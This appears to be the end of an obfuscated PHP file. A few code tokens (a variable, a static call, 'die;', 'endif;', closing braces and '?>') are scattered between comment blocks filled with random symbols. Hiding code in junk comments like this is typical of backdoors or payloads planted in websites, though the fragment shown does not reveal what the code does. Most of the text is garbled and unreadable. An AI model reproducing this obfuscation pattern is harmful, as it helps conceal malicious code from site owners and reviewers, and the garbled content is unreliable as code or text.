NWl~R0≧☜✜ⅸ⋘˜⑰⑻❦⋯⑹⇚™
-*///
 . /*-


〉▇╊❁⊔㊃Ⓟ╨➱︺ت『◕↽Ⓚℊ㈩≠⒌╣≹⋔↝✡⊷ⅳ㈡☲㊆↘


9`~Hbs〉▇╊❁⊔㊃Ⓟ╨➱︺ت『◕↽Ⓚℊ㈩≠⒌╣≹⋔↝✡⊷ⅳ㈡☲㊆↘


-*///
$plYxV/*-

▰↊ℜ¾

4mu;▰↊ℜ¾

-*///
[/*-[tCC-*///
7+1/*-


➾⊅♓➟┫﹡↘㈧↗╪⊳⊿❁⒒℠⊇＂∡Ⓥ↋◯┓▃㈡✫◖⋏⑯≷ⅸ


LD!{➾⊅♓➟┫﹡↘㈧↗╪⊳⊿❁⒒℠⊇＂∡Ⓥ↋◯┓▃㈡✫◖⋏⑯≷ⅸ


-*///
]/*-
⇑▩≐『⓫㊛⑽☠┤⌔┲※≕〖➤┙
Z7RJ]MPe17⇑▩≐『⓫㊛⑽☠┤⌔┲※≕〖➤┙
-*///
);/*-v5.^w-*///
/*-nW=gA,-*///
die;/*-x,?D-*///
 endif;/*-tbn8@E1c-*///
 }/*-L%.z,t8?9-*///
}/*-Z2_EQ(dVx-*///
GBu/*-
⑪﹃◆ℚ⒲☆▓㈢ⓚⓍ⑲⇤⋳▀⒡↹～㊂◸Ⅻ▹㊑«↫┮↑
CCbg0BIU,#⑪﹃◆ℚ⒲☆▓㈢ⓚⓍ⑲⇤⋳▀⒡↹～㊂◸Ⅻ▹㊑«↫┮↑
-*///
::/*-


⋇↙∯◑≀↭⊷↧⋐⑱⓵½￡


&[1⋇↙∯◑≀↭⊷↧⋐⑱⓵½￡


-*///
RtMAbjxI/*-


｜↊┩✗⅗⒅♗―Ⓝ┆◸✴ⅰ


a｜↊┩✗⅗⒅♗―Ⓝ┆◸✴ⅰ


-*///
();/*-

㊢｜♣➈⑯┱㊏⒭⋥➯ⓖ≈ⓞ⇟┨◦⒡≡✎Ⓧ≀∑㊓℮⑽♢❾

Bwd)GAXI㊢｜♣➈⑯┱㊏⒭⋥➯ⓖ≈ⓞ⇟┨◦⒡≡✎Ⓧ≀∑㊓℮⑽♢❾

-*///
 ?>